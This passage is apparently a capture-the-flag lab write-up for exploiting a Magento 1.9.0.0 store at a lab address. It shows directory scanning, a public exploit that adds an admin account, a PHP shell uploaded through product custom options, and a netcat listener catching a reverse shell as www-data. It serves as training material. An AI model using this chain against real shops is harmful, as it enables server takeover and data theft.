2 :80

$ gobuster dir -u 10.10.10.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,html,txt
===============================================================
/index.php            (Status: 200) [Size: 16097]
/media                (Status: 301) [Size: 312] [--> http://10.10.10.140/media/]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.140/includes/]
/lib                  (Status: 301) [Size: 310] [--> http://10.10.10.140/lib/]
/install.php          (Status: 200) [Size: 44]
/app                  (Status: 301) [Size: 310] [--> http://10.10.10.140/app/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.10.140/js/]
/api.php              (Status: 200) [Size: 37]
/shell                (Status: 301) [Size: 312] [--> http://10.10.10.140/shell/]
/skin                 (Status: 301) [Size: 311] [--> http://10.10.10.140/skin/]
/cron.php             (Status: 200) [Size: 0]
/LICENSE.html         (Status: 200) [Size: 10679]
/LICENSE.txt          (Status: 200) [Size: 10410]
/var                  (Status: 301) [Size: 310] [--> http://10.10.10.140/var/]
/errors               (Status: 301) [Size: 313] [--> http://10.10.10.140/errors/]
/mage                 (Status: 200) [Size: 1319]

$ searchsploit magento
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
------------------------------------------------------------------------ ---------------------------------
Magento eCommerce - Remote Code Execution                              | xml/webapps/37977.py

Update target to http://10.10.10.140/index.php

$ python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds kashz1:kashz1

Magento ver. 1.9.0.0
Tried using https://www.exploit-db.com/exploits/37811; did not work.

Catalog > Manage Products > Select a product > Edit > Custom Options > Add New Option
Input Type = File
Allowed File Extensions = .php
Save

Go to product page, select shell.php and add to cart > file is uploaded.
http://10.10.10.140/media/custom_options/quote/<RANDOM-PATH>

$ rlwrap nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.140] 57270
SOCKET: Shell has connected! PID: 1969
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Last updated